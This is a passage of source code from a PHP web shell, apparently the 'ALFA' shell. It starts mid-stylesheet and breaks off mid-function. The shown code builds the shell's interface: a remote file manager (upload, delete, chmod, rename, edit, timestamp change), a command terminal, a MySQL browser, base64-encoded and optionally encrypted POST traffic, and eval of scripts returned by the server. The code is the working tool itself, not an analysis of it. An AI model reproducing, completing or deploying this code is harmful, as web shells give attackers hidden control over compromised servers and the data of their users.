minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{-webkit-animation:minimizeHide .8s ease-in-out forwards;-moz-animation:minimizeHide .8s ease-in-out forwards;-ms-animation:minimizeHide .8s ease-in-out forwards;animation:minimizeHide .8s ease-in-out forwards}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0f0;-moz-text-shadow:0 0 25px #0f0;-ms-text-shadow:0 0 25px #0f0;text-shadow:0 0 25px #0f0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,.72);width:100%;height:100%}.update-content{position:relative}.update-content>a{text-decoration:none;position:absolute;color:rgba(103,167,47,.77);left:24%;margin-top:7%;font-size:40px}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67abdf;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px}.editor-path{top:3px}}.filters-holder{padding:5px;padding-left:10px}.filters-holder input{width:200px}.filters-holder span{color:#8bc7f7}#rightclick_menu{width:175px;visibility:hidden;opacity:0;position:fixed;background:#0f304a;color:#555;font-family:sans-serif;font-size:11px;-webkit-transition:opacity .5s ease-in-out;-moz-transition:opacity .5s ease-in-out;-ms-transition:opacity .5s ease-in-out;-o-transition:opacity .5s ease-in-out;transition:opacity .5s ease-in-out;-webkit-box-shadow:-1px 0 17px 0 #8b8b8c;-moz-box-shadow:-1px 0 17px 0 #8b8b8c;box-shadow:-1px 0 17px 0 #8b8b8c;padding:0;border:1px solid #737373;border-radius:10px}#rightclick_menu a{display:block;color:#fff;font-weight:bolder;text-decoration:none;padding:6px 8px 6px 30px;position:relative;padding-left:40px}#rightclick_menu a i.fa,#rightclick_menu a img{height:20px;font-size:17px;width:20px;position:absolute;left:5px;top:2px;padding-left:5px}#rightclick_menu a span{color:#bcb1b3;float:right}#rightclick_menu a:hover{color:#fff;background:#3879d9}#rightclick_menu hr{border:1px solid #ebebeb;border-bottom:0}.cl-popup-fixed{position:fixed;top:0;left:0;width:100%;height:100%;background:#201e1ead}#shortcutMenu-holder{position:absolute;top:40%;left:50%;transform:translate(-50%,-50%);background:#1f1e1edb;height:190px;width:500px;color:#fff}#shortcutMenu-holder>.popup-head{background:#207174;padding:6px;border-top:10px;text-align:center;font-family:sans-serif;color:#fff}#shortcutMenu-holder>form{padding:10px}#shortcutMenu-holder>form>label{display:block}#shortcutMenu-holder>form>input{width:99%;height:24px;margin-top:4px;color:#fff;outline:0;font-size:16px}#shortcutMenu-holder>.popup-foot{float:right;height:30px;margin-right:8px}#shortcutMenu-holder>.popup-foot>button{height:100%;cursor:pointer;color:#fff;outline:0}.php-terminal-output{overflow:auto;height:86%;border:1px solid #1e5673;border-radius:10px}.cmd-history-holder{visibility:hidden;opacity:0;position:absolute;color:#dff3d5;background:#093d58;top:-300px;height:300px;width:calc(69% + -11px);border-radius:10px 10px 0 0;left:calc(2% - 9px);transition:visibility .5s,opacity .5s linear}.cmd-history-holder .commands-history-header{background:#37504e;text-align:center;border-radius:10px 10px 0 0}.cmd-history-icon{width:27px;top:6px;left:calc(69% + 5px);position:absolute;cursor:pointer}.history-cmd-line{padding:4px;border-bottom:1px dashed;cursor:pointer}.history-cmd-line:hover{background:#961111}#myUL,#myUL ul{list-style-type:none}#myUL{margin:0;padding:0}.box{cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.box::before{content:"\\2610";color:#000;display:inline-block;margin-right:6px}.check-box::before{content:"\\2611";color:#1e90ff}.nested{display:none}.active{display:block}.flag-holder>img{width:20px;vertical-align:middle;padding-left:6px}#options_window .content_options_holder .options_holder{position:relative;display:none;overflow:auto;min-height:300px;max-height:calc(100vh - 100px)}#options_window .content_options_holder .options_holder .header{min-height:50vh}#options_window .content_options_holder .options_holder.option_is_active{display:block}#options_window .content_options_holder .options_tab{padding:5px;margin-left:14px;margin-right:30px;background:#000;border-bottom:7px solid #0f304a;border-left:7px solid #0f304a;border-right:7px solid #0f304a;overflow-x:auto;white-space:nowrap}#filesman_tabs .filesman_tab img,#options_window .content_options_holder .options_tab .tab_name img,.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img{width:10px;vertical-align:middle;margin-left:5px}#filesman_tabs .filesman_tab,#options_window .content_options_holder .options_tab .tab_name,.editor-tab-name,.sql-tabs .sql-newtab,.sql-tabs .sql-tabname,.terminal-tabs .terminal-tab{display:inline-block;background-color:#133d51;border-radius:4px;padding:5px;color:#fff;margin-right:3px;padding:5px;cursor:pointer;margin-bottom:1px;transition:background-color .5s}#filesman_tabs .filesman_tab{min-width:55px;text-align:center}#filesman_tabs .filesman_tab:hover,#options_window .content_options_holder .options_tab .tab_name:hover,.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{background-color:#a23939}.editor-tabs,.sql-tabs,.terminal-tabs{padding:5px;overflow-x:auto;white-space:nowrap}.options-loader-holder{position:absolute;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:11}.options-loader-holder img{position:absolute;top:32%;left:45%;transform:translate(-50%,-50%);width:100px;animation:spin 2s infinite}#filesman_tabs .filesman_tab.filesman-tab-active,#options_window .content_options_holder .options_tab .tab_name.tab_is_active,.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{background-color:#009688}.tab-is-done{animation:2s tab_change_color infinite step-end}.stopAjax{color:#fff;font-size:20px;display:inline-block;padding:10px;cursor:pointer}#a_loader{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:99}.fmanager-row>td{position:relative}.fmanager-row .symlink_path{position:fixed;max-width:100%;background-color:#0f304a;border-radius:10px;font-size:15px;padding:8px;color:#fdf4f4;border:1px solid #8a8a8a;z-index:1;pointer-events:none}.archive-icons{vertical-align:middle}.archive-type-dir{font-weight:bolder}.archive-type-file{font-weight:unset}.archive-name{cursor:pointer}.archive_dir_holder a{color:#0f0;font-weight:bolder;cursor:pointer}.archive_dir_holder a:hover{color:#fff}.editor-content{height:100%}.editor-content-holder{height:90%}.editor-contents{display:none;position:relative;height:100%}.editor-contents.editor-content-active{display:block}.history-panel-controller{position:absolute;color:#fff;padding:10px;z-index:1000;border-radius:10px;top:50%;left:19%;background-color:#009687;cursor:pointer}.sql-content{display:none;position:relative;min-height:300px}.sql-content.sql-active-content{display:block}.pages-holder{padding:7px}.pages-number{display:inline-block;margin-left:10px}.pages-holder .pages-number a.page-number{padding:5px;background:#0f304a;margin-right:8px;cursor:pointer;width:33px;display:inline-block;text-align:center;border-radius:5px;color:#fff;transition:background .5s}.active-page-number{background:#10925c!important}.pages-number a.page-number:hover{background:#8a8a8a}.terminal-content{height:100%}.terminal-content,.terminal-tab{display:none}.terminal-content.active-terminal-content{display:block;position:relative}.terminal-btn-fontctl{background:#009688;width:50px;color:#fff;font-weight:bolder;outline:0;cursor:pointer}.alert-area{max-height:100%;position:fixed;bottom:5px;left:20px;right:20px;z-index:9999}.alert-box{font-size:16px;color:#fff;background:rgba(0,0,0,.9);line-height:1.3em;padding:10px 15px;margin:5px 10px;position:relative;border-radius:5px;transition:opacity .5s ease-in;-webkit-animation:alert-shake .5s ease-in-out;animation:alert-shake .5s ease-in-out}.alert-content-title{font-weight:700}.alert-box.alert-success{background:rgba(56,127,56,.89)}.alert-error{background:rgba(191,54,54,.89)}.alert-box.hide{opacity:0}.alert-close{background:0 0;width:12px;height:12px;position:absolute;top:15px;right:15px}.alert-close:after,.alert-close:before{content:"";width:15px;border-top:solid 2px #fff;position:absolute;top:5px;right:-1px;display:block}.alert-close:before{transform:rotate(45deg)}.alert-close:after{transform:rotate(135deg)}.alert-close:hover:after,.alert-close:hover:before{border-top:solid 2px #d8d8d8}@media (max-width:767px) and (min-width:481px){.alert-area{left:100px;right:100px}}@media (min-width:768px){.alert-area{width:350px;left:auto;right:0;z-index:9999}}@keyframes tab_change_color{0%{background-color:#133d51}50%{background-color:green}}@-webkit-keyframes alert-shake{0%{-webkit-transform:translateX(0)}20%{-webkit-transform:translateX(-10px)}40%{-webkit-transform:translateX(10px)}60%{-webkit-transform:translateX(-10px)}80%{-webkit-transform:translateX(10px)}100%{-webkit-transform:translateX(0)}}@keyframes alert-shake{0%{transform:translateX(0)}20%{transform:translateX(-10px)}40%{transform:translateX(10px)}60%{transform:translateX(-10px)}80%{transform:translateX(10px)}100%{transform:translateX(0)}}.textEffect{position:absolute;width:500px;top:-10px;animation:alert-shake .5s ease-in-out;animation-iteration-count:2}.alfateam-loader-text{position:absolute;color:#46bb45;top:23%;left:49%;transform:translate(-50%,-50%);font-size:40px;letter-spacing:7px}.alfa-ajax-error{position:absolute;color:#ff0a0a;top:50%;left:50%;transform:translate(-50%,-50%);font-size:30px}.connection-hist-table{margin-left:auto;margin-right:auto;text-align:justify;border-collapse:collapse}.connection-hist-table td,.connection-hist-table th{border:1px solid #ddd;text-align:left;padding:8px}.connection-his-btn{margin-bottom:10px;padding:5px;background:#206920;color:#fff;border:none;outline:0;cursor:pointer;font-weight:700;transition:background .3s}.connection-his-btn.connection-delete{margin:unset;padding:5px;background:red;width:33px;border-radius:3px;transition:background .3s}.connection-delete:hover{background:#f56969!important}.connection-his-btn:hover{background:#30b330}#up_bar_holder{position:fixed;z-index:100000;width:100%}#filesman_tabs{padding:8px;border:1px solid #0e304a;color:#67abdf;overflow-x:auto;white-space:nowrap}.sortable-ghost{opacity:.5;background:#c8ebfb}.folder-tab-icon{width:16px!important}#filesman-tab-full-path{display:none;position:absolute;pointer-events:none;background:#163746;padding:7px;color:#0f0;border-radius:10px;min-width:58px;z-index:10}#filesman-tab-full-path::after{content:"";position:absolute;top:100%;left:35px;margin-left:-5px;border-width:5px;border-style:solid;pointer-events:none;border-color:#163746 transparent transparent transparent}.mysql-main{height:84vh;position:relative}.mysql-hide-content{display:none}.mysql-query-result-tabs{margin-bottom:10px;padding:3px;border-bottom:4px solid #0f304a}.mysql-main .tables-panel-ctl{position:absolute;color:#fff;padding:10px;z-index:1;border-radius:10px;top:45%;left:calc(17% + 10px);background-color:#009687;cursor:pointer}.tables-panel-ctl-min{left:-21px!important}.mysql-query-result-tabs div{display:inline-block;padding:5px;margin-right:2px;background:#133d51;color:#fff;cursor:pointer;transition:background-color .5s}.mysql-query-result-tabs div:hover{background-color:#a23939}.mysql-query-result-tabs div.mysql-query-selected-tab{background:red}table tr.tbl_row:nth-child(odd){background:#424040}.mysql-tables .tables-row{margin-left:26px}.mysql-main .mysql-query-results,.mysql-main .mysql-tables{float:left;height:100%;overflow:auto}.mysql-main .mysql-query-results{width:calc(80% + 4px);margin-left:5px;position:relative;overflow:unset}.mysql-main .mysql-query-results-fixed{width:100%}.mysql-main .mysql-query-results .mysql-query-content{height:89%;overflow:auto}.mysql-query-tab-hide{height:0!important;padding:0!important}.mysql-main .mysql-tables{width:19%;border-right:4px solid #0e304a}.mysql-main table td{vertical-align:top}.mysql-main .mysql-search-area table td{vertical-align:middle;padding:7px}.mysql-tables .block{position:relative;width:1.5em;height:1.5em;min-width:16px;min-height:16px;float:left}.mysql-tables div.block b,.mysql-tables div.block i{width:1.5em;height:1.7em;min-width:16px;min-height:8px;position:absolute;bottom:.7em;left:.75em;z-index:0}.mysql-tables .block i{display:block;border-left:1px solid #666;border-bottom:1px solid #666;position:relative;z-index:0}.mysql-tables .block b{display:block;height:.75em;bottom:0;left:.75em;border-left:1px solid #666}.mysql-tables div.block a,.mysql-tables div.block u{position:absolute;left:50%;top:50%;z-index:10}.mysql-tables div.block img{position:relative;top:-.6em;left:0;margin-left:-7px}.mysql-tables .clearfloat{clear:both}.mysql-tables ul{list-style-type:none;margin-left:0;padding:0}.mysql-tables ul li{white-space:nowrap;clear:both;min-height:16px}.mysql-tables .db_name{margin-left:10px}.mysql-tables .list_container{border-left:1px solid #666;margin-left:.75em;padding-left:.75em}.hide-db-tables{display:none}.mysql-main:after{content:"";display:table;clear:both}table.mysql-data-tbl{border:none!important;border-collapse:collapse!important}table.mysql-data-tbl tr th{padding:5px}table.mysql-data-tbl td{border-left:3px solid #305a8d;border-right:3px solid #305a8d;padding:6px}table.mysql-data-tbl td:first-child{border-left:none}table.mysql-data-tbl td:last-child{border-right:none}.mysql-insert-result,.mysql-structure-qres,.mysql-update-result{display:none;text-align:center;padding:10px;border:1px dashed;margin:22px}#alfa-copyright{margin-top:15px}.ic_b_plus{background-image:url(http://solevisible.com/icons/menu/b_plus.png)}.ic_b_minus{background-image:url(http://solevisible.com/icons/menu/b_minus.png)}\r\n<?php echo \'\r\n@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}\r\n@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}\r\n@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}\r\n@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}\r\n#alfaloader{\'.$csscode.\'width:100px;height:100px;}\r\n#a_loader img{\'.$csscode.\'width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}\r\n.ajaxarea{display:none;border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:\'.alfa_getColor("header_values").\';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url(\'.__showicon(\'alfamini\').\');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:\'.($GLOBALS[\'DB_NAME\'][\'show_icons\']==\'1\'?\'0\':\'1\').\'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url(\'.__showicon(\'alfamini\').\');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url(\'.__showicon(\'btn\').\');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],input[type=number],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}\r\n.foottable{width: 300px;font-weight: bold;\'.(!@is_writable($GLOBALS[\'cwd\'])?\'}.dir{background-color:red;}\':\'}\').\'.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464 !important;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }.alfa_custom_cmd_btn {padding: 5px;color: #24ff03;cursor: pointer;}.ajaxarea.filesman-active-content {display: block;}\'.alfaCssLoadColors().\'\r\n</style>\';\r\necho "<script type=\'text/javascript\'>\r\nvar c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';\r\nvar a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\';\r\nvar charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';\r\nvar islinux = ".($GLOBALS[\'sys\']!="win"?\'true\':\'false\').";\r\nvar post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?\'true\':\'false\').";";?>\r\nvar alfa1_="",alfa2_="",alfa3_="",alfa4_="",alfa5_="",alfa6_="",alfa7_="",alfa8_="",alfa9_="",alfa10_="",d=document,mysql_cache={},editor_files={},editor_error=!0,editor_current_file="",php_temrinal_using_cgi=!1,is_minimized=!1,cgi_is_minimized=!1,options_window_is_minimized=!1,database_window_is_minimized=!1,rightclick_menu_context=null,can_hashchange_work=!0,alfa_can_add_opt=!1,alfa_before_do_action_id="",alfa_ace_editors={editor:null,eval:null},col_dumper_selected_data={},_ALFA_AJAX_={},cgi_lang="",upcount=1,terminal_walk_index=[],alfa_current_fm_id=1,alfa_fm_id=0;function set(e,a,t,i,l,o,r,n,s,c,f,_,u){d.mf.a.value=null!=e?e:a_,d.mf.c.value=null!=a?a:c_,d.mf.alfa1.value=null!=t?t:"",d.mf.alfa2.value=null!=i?i:"",d.mf.alfa3.value=null!=l?l:"",d.mf.alfa4.value=null!=o?o:"",d.mf.alfa5.value=null!=r?r:"",d.mf.alfa6.value=null!=n?n:"",d.mf.alfa7.value=null!=s?s:"",d.mf.alfa8.value=null!=c?c:"",d.mf.alfa9.value=null!=f?f:"",d.mf.alfa10.value=null!=_?_:"",d.mf.charset.value=null!=u?u:charset_}function fc(e){var a=alfa_current_fm_id,t="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",i="",l=0;if(d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked&&(l++,i+="f[]="+alfab64(decodeURIComponent(e.value))+"&")}),0==l&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder_"+a,"block"),e.alfa1.value){case"delete":d.querySelectorAll("#filesman_holder_"+a+" .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),d.querySelector("#filesman_holder_"+a+" .chkbx").checked=!1;break;case"copy":case"move":case"zip":case"unzip":d.querySelectorAll("#filesman_holder_"+a+" input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,t+i,function(e){alfaloader("filesman_holder_"+a,"none"),alfaFmngrContextRow()},!1,"filesman_holder_"+a)}function initDir(e){var a="",t="";islinux&&(a="<a class=\\"header_pwd\\" onclick=\\"g(\'FilesMan\',\'/\');\\" path=\'/\' href=\'#action=fileman&path=/\'>/</a>",t="/");var l=e.split("/"),o="",r=islinux?"/":"";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\\"g(\'FilesMan\',\'"+r+l[i]+"/\');\\" path=\'"+r+l[i]+"/\' href=\'#action=fileman&path="+r+l[i]+\'/\\\' class="header_pwd">\'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status?"function"==typeof t&&(t(o.responseText,l),alfaClearAjax(l)):4==o.readyState&&200!=o.status&&(alfaAjaxError(o.status,l,o.statusText,o.responseText),alfaClearAjax(l))},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function alfaClearAjax(e){_ALFA_AJAX_.hasOwnProperty(e)&&delete _ALFA_AJAX_[e]}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=alfa_current_fm_id,l=new FormData,o="filesman_holder_"+i;l.append("a",alfab64(e.a.value)),l.append("c",alfab64(e.c.value)),l.append("alfa1",alfab64(e.alfa1.value)),l.append("charset",alfab64(e.charset.value)),l.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)l.append("f[]",e.files[a]);else l.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var r=1;r<=upcount;r++){var n=$("pfooterup_"+r);n&&n.parentNode.removeChild(n),upcount--}if(0==upcount&&upcount++,0==t)return!1;var s="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id=\'"+s+"\' class=\'up_bar\'></div>");e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var c=$(s);_ALFA_AJAX_[s]=a,a.upload&&(c.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";c.style.width=i}),a.onload=function(e){200===a.status?c.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText),alfaClearAjax(s)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status){if("noperm"!=a.responseText&&"[]"!=a.responseText){var e,t=JSON.parse(a.responseText),l="",r=d.querySelectorAll("#"+o+" #filemanager_table tr").length-3;for(e in t){++r;var n=t[e].name,s=encodeURIComponent(n),c=t[e].size,f=t[e].perm,_=t[e].modify,u=t[e].owner,p=loadType(n,"file");try{d.querySelector("#"+o+" .fmanager-row a[fname=\'"+n+"\']").parentElement.parentElement.parentElement.remove()}catch(e){}l+=\'<tr class="fmanager-row" id="tr_row_\'+r+\'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="\'+n+\'" class="chkbx" id="checkbox\'+r+\'"><label for="checkbox\'+r+\'"></label></div></td><td id="td_row_\'+r+\'">\'+p+\'<div style="position:relative;display:inline-block;bottom:12px;"><a row="\'+r+\'" id="id_\'+r+\'" class="main_name" onclick="editor(\\\'\'+s+"\',\'auto\',\'\',\'\',\'\',\'file\');\\" href=\\"#action=fileman&amp;path="+c_+"&amp;file="+s+\'" fname="\'+n+\'" ftype="file" path="\'+c_+\'" opt_title="">\'+n+\'</a></div></td><td><span style="font-weight:unset;" class="main_size">\'+c+\'</span></td><td><span style="font-weight:unset;" class="main_modify">\'+_+\'</span></td><td><span style="font-weight:unset;" class="main_owner_group">\'+u+\'</span></td><td><a id="id_chmode_\'+r+\'" href="javascript:void(0)" onclick="editor(\\\'\'+s+"\',\'chmod\',\'\',\'\',\'\',\'file\')\\">"+f+\'</a></td><td><a id="id_rename_\'+r+\'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\\\'\'+s+"\', \'rename\',\'\',\'\',\'\',\'file\')\\">R</a> <a id=\\"id_touch_"+r+\'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\\\'\'+s+"\', \'touch\',\'\',\'\',\'\',\'file\')\\">T</a> <a id=\\"id_edit_"+r+\'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\\\'\'+s+"\', \'edit\',\'\',\'\',\'\',\'file\')\\">E</a> <a id=\\"id_download_"+r+\'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\\\'FilesTools\\\',null,\\\'\'+n+"\', \'download\')\\">D</a><a id=\\"id_delete_"+r+\'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\\\'Are You Sure For Delete # \'+s+" # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \'"+s+"\') : \'\';\\"> X </a></td></tr>"}d.querySelector("#"+o+" #filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");alfaCheckCurrentFilesManTab(i)}},a.open("POST",d.URL),a.send(l)}}function alfaCheckCurrentFilesManTab(e){-1==$("filesman_tab_"+e).classList.value.indexOf("filesman-tab-active")&&$("filesman_tab_"+e).classList.add("tab-is-done")}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){var 